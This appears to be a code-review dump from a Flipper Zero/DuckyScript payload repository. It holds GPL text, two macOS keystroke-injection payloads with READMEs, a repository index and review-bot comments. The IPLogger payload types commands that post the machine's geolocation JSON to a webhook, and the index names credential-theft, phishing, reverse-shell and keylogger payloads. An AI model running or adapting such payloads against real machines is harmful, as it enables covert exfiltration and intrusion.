If the Program specifies that a proxy can decide which future
versions of the GNU General Public License can be used, that proxy's
public statement of acceptance of a version permanently authorizes you
to choose that version for the Program.
Later license versions may give you additional or different
permissions. However, no additional obligations are imposed on any
author or copyright holder as a result of your choosing to follow a
later version.
15. Disclaimer of Warranty.
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
16. Limitation of Liability.
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES.
17. Interpretation of Sections 15 and 16.
If the disclaimer of warranty and limitation of liability provided
above cannot be given local legal effect according to their terms,
reviewing courts shall apply local law that most closely approximates
an absolute waiver of all civil liability in connection with the
Program, unless a warranty or assumption of liability accompanies a
copy of the Program in return for a fee.
END OF TERMS AND CONDITIONS
How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
state the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
<one line to give the program's name and a brief idea of what it does.>
Copyright (C) <year> <name of author>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>.
Also add information on how to contact you by electronic and paper mail.
If the program does terminal interaction, make it output a short
notice like this when it starts in an interactive mode:
<program> Copyright (C) <year> <name of author>
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it
under certain conditions; type `show c' for details.
The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License. Of course, your program's commands
might be different; for a GUI interface, you would use an "about box".
You should also get your employer (if you work as a programmer) or school,
if any, to sign a "copyright disclaimer" for the program, if necessary.
For more information on this, and how to apply and follow the GNU GPL, see
<https://www.gnu.org/licenses/>.
The GNU General Public License does not permit incorporating your program
into proprietary programs. If your program is a subroutine library, you
may consider it more useful to permit linking proprietary applications with
the library. If this is what you want to do, use the GNU Lesser General
Public License instead of this License. But first, please read
<https://www.gnu.org/licenses/why-not-lgpl.html>.
@@ -0,0 +1,19 @@
REM ==============================================================
REM Script created by bst04
REM Works on macOS systems
REM This script opens Terminal, fetches the public IP address
REM of the device, and sends it to a Discord webhook.
REM It uses curl to send the IP without JSON.
REM ===============================================================
DELAY 500
GUI SPACE
DELAY 500
STRING Terminal
ENTER
DELAY 1000
STRING location=$(curl -s https://ipapi.co/json/)
ENTER
DELAY 1000
STRING curl -X POST -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "content=$location" https://yourwebhook
ENTER
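Review bot: the REM header and the commands disagree about what is sent off the machine. `curl -s https://ipapi.co/json/` returns that service's full JSON geolocation record, not just the IP address, and the whole response body is then posted as `content=$location`, so the payload ships more data than the comment "fetches the public IP address ... sends the IP without JSON" describes; either reword the REM block to say the JSON record is sent, or change the query to an endpoint that returns only the address. `https://yourwebhook` is a placeholder that has to be replaced before use; say so in a REM line so the 🟡 PAP status is visible from the payload itself. Minor: the two `REM ====` rules have different lengths.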
@@ -0,0 +1,36 @@
# IPLogger-FlipZero by bst04
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
This script, created by bst04, is designed to work on macOS systems. It opens Terminal, fetches the public IP address of the device, and sends it to a Discord webhook using `curl`.
---
## Technical Explanation
1. **Initialization**:
- `DELAY 500`: Waits for 0.5 seconds to ensure the system is ready.
- `GUI SPACE`: Simulates pressing the "Command" + "Space" keys to open Spotlight Search.
- `DELAY 500`: Waits for 0.5 seconds for Spotlight to open.
- `STRING Terminal`: Types "Terminal" to search for the Terminal application.
- `ENTER`: Opens the Terminal application.
2. **Fetch Public IP Address**:
- `DELAY 1000`: Waits for 1 second to ensure Terminal is fully opened.
- `STRING location=$(curl -s https://ipapi.co/json/)`: Fetches the public IP address and stores it in a variable named `location`.
3. **Send IP Address to Discord Webhook**:
- `DELAY 1000`: Waits for 1 second to ensure the previous command is executed.
- `STRING curl -X POST -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "content=$location" https://yourwebhook`: Sends the link to the specified Discord webhook.
---
## Usage
1. Copy the payload script to your DuckyScript-enabled device.
2. Ensure the device is connected to a macOS system.
3. Execute the payload to fetch and send the public IP address to your Discord webhook.
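Review bot: step 3 of the Technical Explanation says the final command "Sends the link to the specified Discord webhook", but nothing in the payload is a link: `$location` holds the response body of `https://ipapi.co/json/`, a JSON geolocation record, so the sentence should say that the fetched JSON (the IP address plus the other fields the service returns) is posted as the message content, and the intro sentence should not describe the payload as sending only the IP address. Step 2 also omits the `ENTER` that follows the `STRING location=...` line in the payload. The Usage section should state that `https://yourwebhook` must be replaced with the user's own webhook URL before copying the payload, which is the reason the index marks it 🟡.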
@@ -0,0 +1,37 @@
# 🔊 SetVolumeMax-FlipZero by bst04
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
This payload, created by bst04, is designed to set the volume to maximum (100%) on a macOS device using AppleScript through Terminal.
---
## 📖 Technical Explanation
1. **Initialization**:
- `DELAY 1000`: Waits for 1 second to ensure the system is ready.
- `GUI SPACE`: Simulates pressing "Command" + "Space" to open Spotlight Search.
- `DELAY 250`: Waits for 0.25 seconds to ensure Spotlight is open.
2. **Set Volume to 100%**:
- `STRING VOL=$(osascript -e 'Set Volume 100')`: Types the AppleScript command to set the system volume to 100%.
- `DELAY 250`: Waits for 0.25 seconds.
- `ENTER`: Executes the command to set the volume.
3. **Close Terminal**:
- `DELAY 250`: Waits for 0.25 seconds.
- `GUI q`: Simulates pressing "Command" + "q" to quit the Terminal application.
---
## 📜 Usage
1. Copy the payload script to your DuckyScript-enabled device.
2. Ensure the device is connected to a macOS system.
3. Execute the payload to set the system volume to maximum (100%).
---
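Review bot: the intro says the volume is set "using AppleScript through Terminal", but the Technical Explanation never opens Terminal: after `GUI SPACE` opens Spotlight, step 2 types the `osascript` line straight into the Spotlight field, so the documented steps do not run the command in a shell, and the "Close Terminal" step quits whichever application is frontmost. Either the steps should include a `STRING Terminal` / `ENTER` / `DELAY` sequence like the IPLogger README documents, or the intro should not mention Terminal. The explanation of `'Set Volume 100'` as "set the system volume to 100%" is also misleading: AppleScript's bare `set volume N` form uses the legacy 0-7 scale and reaches maximum here only because the out-of-range value is clamped; `set volume output volume 100` is the form that literally means 100%.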
@@ -0,0 +1,12 @@
REM ===========================
REM payload by bst04
REM ===========================
DELAY 1000
GUI SPACE
DELAY 250
STRING VOL=$(osascript -e 'Set Volume 100')
DELAY 250
ENTER
DELAY 250
GUI q
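Review bot: nothing between `GUI SPACE` and `STRING VOL=$(osascript -e 'Set Volume 100')` opens a terminal, so the command is typed into the Spotlight search field and `ENTER` launches whatever Spotlight matched instead of executing it; the trailing `GUI q` then quits the frontmost application. Add the `STRING Terminal`, `ENTER` and a `DELAY` (as in the IPLogger payload above) before the command line, and confirm on a real macOS host. The `VOL=$(...)` assignment captures nothing useful, since `set volume` prints nothing, and can be reduced to the bare `osascript -e` call.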
@@ -0,0 +1,57 @@
# My Flipper Shits - MacOS
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits) [![GitHub Sponsor](https://img.shields.io/github/sponsors/aleff-github?label=Sponsor&logo=GitHub&style=for-the-badge)](https://github.com/sponsors/aleff-github) [![Licence](https://img.shields.io/badge/Licence-GPLv3-%239e264c?style=for-the-badge)](https://github.com/aleff-github/my-flipper-shits/blob/main/LICENCE)
* [Disclaimer](#disclaimer)
* [PlugAndPlay (PAP) Legend](#plugandplay-pap-legend)
* [Payloads](#payloads)
* [Videos](#videos)
* [FAQs](#faqs)
* [Credits](#credits)
* [Donations](#donations)
## Disclaimer
<div align=center>
<img src="https://raw.githubusercontent.com/aleff-github/my-flipper-shits/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://raw.githubusercontent.com/aleff-github/my-flipper-shits/main/img/DISCLAIMER.png" width="600" />
</div>
## PlugAndPlay (PAP) Legend
- 🟢 Totally - You must do nothing
- 🟡 Partial - Just something like a Dropbox Token or Discord Webhook...
- 🔴 Manual effort request
## Payloads
|System|Category|Name|PAP|
|--|--|--|--|
|![MacOS](https://img.shields.io/badge/macos-000000?style=for-the-badge&logo=macos&logoColor=white)|Execution|[IPLogger - Discord Webhook - by bst04](https://github.com/aleff-github/my-flipper-shits/tree/main/MacOS/Execution/IPLogger-Discord_Webhook-by_bst04)|🟡|
|![MacOS](https://img.shields.io/badge/macos-000000?style=for-the-badge&logo=macos&logoColor=white)|Execution|[Set Volume Max - MacOS - by bst04](https://github.com/aleff-github/my-flipper-shits/tree/main/MacOS/Execution/SetVolumeMax-MacOS)|🟢|
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://raw.githubusercontent.com/aleff-github/aleff-github/main/img/github.png width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://raw.githubusercontent.com/aleff-github/aleff-github/main/img/linkedin.png width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
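Review bot: the table of contents links to `#videos`, `#faqs` and `#donations`, but this file only contains the Disclaimer, PlugAndPlay Legend, Payloads and Credits headings, so three of the seven entries are dead anchors; drop them or add the sections. Style: the two `<img src=https://...>` tags in the Credits table leave the `src` value unquoted while every other `<img>` in the file quotes it.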
@@ -0,0 +1,251 @@
# My Flipper Shits
<link rel="icon" href="https://github.com/aleff-github/my-flipper-shits/raw/main/img/gif/flipper_zero%20(15).gif" type="image/gif" >
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits) [![Licence](https://img.shields.io/badge/Licence-GPLv3-%239e264c?style=for-the-badge)](https://github.com/aleff-github/my-flipper-shits/blob/main/LICENCE)
* [Disclaimer](#disclaimer)
* [PlugAndPlay (PAP) Legend](#plugandplay-pap-legend)
* [Stats](#stats)
* [Top Payload Contributors](#top-payload-contributors)
* [Payloads](#payloads)
* [FAQs](#faqs)
* [Some Boring Considerations](#some-boring-considerations)
* [Credits](#credits)
## Disclaimer
<div align=center>
<img src="https://raw.githubusercontent.com/aleff-github/my-flipper-shits/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://raw.githubusercontent.com/aleff-github/my-flipper-shits/main/img/DISCLAIMER.png" width="600" />
</div>
## PlugAndPlay (PAP) Legend
- 🟢 Totally - You must do nothing
- 🟡 Partial - Just something like a Dropbox Token or Discord Webhook...
- 🔴 Manual effort request
## Stats
|Type|Count|
|--|--|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|30|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|52|
|![iOS](https://img.shields.io/badge/iOS-000000?style=for-the-badge&logo=ios&logoColor=white)|5|
|![macOS](https://img.shields.io/badge/mac%20os-000000?style=for-the-badge&logo=macos&logoColor=F0F0F0)|2|
|**Tot**|89|
|**Community** contributions|7|
|**Hak5** Payload accepted|116|
|**Hak5** Payload Awarded|2|
## Top Payload Contributors
Contribute to the repository by publishing your payloads to climb the rankings
|Rank|Contributor|Payloads Published|
|----|-----------|------------------|
|🥇 1st|**[bst04](https://github.com/brunoooost)**|5|
|🥈 2nd|**[NexusWannaBe](https://github.com/NexusWannaBe)**|2|
|🥉 3rd| **[*maybe you...*](https://github.com/settings/profile)**|0|
## Payloads
|System|Category|Name|PAP|
|--|--|--|--|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Credentials|[WiFi Windows Passwords](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Credentials/WiFiPasswords_Windows)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Credentials|[Defend Yourself From CVE-2023-23397](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Credentials/Defend_yourself_from_CVE-2023-23397)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Exfiltration|[Exfiltrate Windows Product Key](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Exfiltration/Exfiltrate_Windows_Product_Key)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Exfiltration|[Exfiltrate Process Info - Windows](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Exfiltration/ExfiltrateProcessInfo_Windows)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Exfiltration|[ProtonVPN config](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Exfiltration/ProtonVPNConfigFile_Windows)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Exfiltration|[Windows netstat](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Exfiltration/Netstat_Windows)|🔴|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Exfiltration|[Exfiltrate Computer Screenshots](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Exfiltration/ExfiltrateComputerScreenshots)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Exfiltration|[Export Cookies From Firefox](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Exfiltration/Export_Cookies_From_Firefox)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Exfiltration|[Exports all the links of the downloads](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Exfiltration/Exports_all_the_links_of_the_downloads)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Exfiltration|[Tree structure of the operating system](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Exfiltration/Tree_structure_of_the_operating_system)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Exfiltration|[Export all saved certificates with Adobe Reader](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Exfiltration/Export_all_saved_certificates_with_Adobe_Reader)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Exfiltration|[Exfiltrates the entire database of the Notion client](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Exfiltration|[Create And Exfiltrate A Webhook Of Discord](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Process Info - Linux](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateProcessInfo_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Network Traffic](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateNetworkTraffic_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Linux Documents](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateDocumentsFolder_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Linux Logs](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateLogFiles_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Network Configuration](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateNetworkConfiguration_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Email And Password By Phising](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateEmailAndPasswordByPhising_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Sudo Password By Phishing](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateSudoPasswordByPhising_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate WiFi Passwords](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateWiFiPasswords_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Photos Through Shell](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltratePhotosThroughShell)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Exfiltration|[Save Your Thunderbird Settings](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Exfiltration/Save_Your_Thunderbird_Settings)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Phising|[Standard Phishing Attack](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Phising/StandardPhishingAttack_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Phising|[Standard Phishing Payload Using kdialog](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Phising/StandardPhishingPayloadUsingKdialog_Linux)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Install Official VSCode Extension](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Install_Official_VSCode_Extension)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Install Any Arbitrary VSCode Extension](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Install_Any_Arbitrary_VSCode_Extension)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Set An Arbitrary And Persistent Tor Circuit](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Set An Arbitrary And Persistent Tor Circuit](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Set Tor Bridge](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Set_Tor_Bridge)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Exploiting An Executable File](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/ExploitingAnExecutableFile)|🟢|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Change MAC Address](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/ChangeMacAddress_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Set Arbitrary VPN](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/SetArbitraryVPN_Linux)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Close All Applications](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/CloseAllApplications_Windows)|🟢|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Change Network Configuration](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/ChangeNetworkConfiguration_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Edit The Default Real App With An Arbitrary](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/Edit_The_Default_Real_App_With_An_Arbitrary)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Uninstall Signal](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/UninstallSignal)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Set An Arbitrary DNS - IPv4 version](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Set_An_Arbitrary_DNS-IPv4_version)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Add An Excepiton To Avast Antivirus](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Add_An_Excepiton_To_Avast_Antivirus)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Make Windows performant (but ugly and boring)](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Make_Windows_performant_(but_ugly_and_boring))|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Change Windows User Name](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Change_Windows_User_Name)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Starting a PowerShell with administrator permissions in Windows](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Change the password of the Windows user](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Change_the_password_of_the_windows_user)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Stop A Single Process In Windows](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Stop_A_Single_Process_In_Windows)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Uninstall A Specific App On Windows Through Control Panel](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Persistent Reverse Shell - Telegram Based](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/Persistent_Reverse_Shell-Telegram_Based)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Telegram Persistent Connection Linux](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/Telegram_Persistent_Connection_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Persistent Keylogger - Telegram Based](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/Persistent_Keylogger-Telegram_Based)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Change Git Remote Link](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/ChangeGitRemoteLink)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Change Git Remote Link](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/ChangeGitRemoteLink)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Send Messages In Discord Channel-Server](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Send_Messages_In_Discord_Channel-Server)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Install And Run Any Arbitrary Executable - No Internet And Root Needed](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Defend yourself against AtlasVPN bugdoor](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/Defend_yourself_against_AtlasVPN_bugdoor)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Shutdown After 1 Minute - By NexusWannaBe](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Shutdown_After_1_Minute-By_NexusWannaBe)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Immediate Shutdown - By NexusWannaBe](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Immediate_Shutdown-By_NexusWannaBe)|🟢|
|![MacOS](https://img.shields.io/badge/macos-000000?style=for-the-badge&logo=macos&logoColor=white)|Execution|[IPLogger - Discord Webhook - by bst04](https://github.com/aleff-github/my-flipper-shits/tree/main/MacOS/Execution/IPLogger-Discord_Webhook-by_bst04)|🟡|
|![MacOS](https://img.shields.io/badge/macos-000000?style=for-the-badge&logo=macos&logoColor=white)|Execution|[Set Volume Max - MacOS - by bst04](https://github.com/aleff-github/my-flipper-shits/tree/main/MacOS/Execution/SetVolumeMax-MacOS)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[CheckBattery - by bst04](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/CheckBattery-by_bst04)|🟢|
|![iOS](https://img.shields.io/badge/iOS-000000?style=for-the-badge&logo=ios&logoColor=white)|Prank|[Text Someone Message With iPhone - by bst04](https://github.com/aleff-github/my-flipper-shits/tree/main/iOS/Execution/Text_Someone_Message_With_iPhone-by_bst04)|🟡|
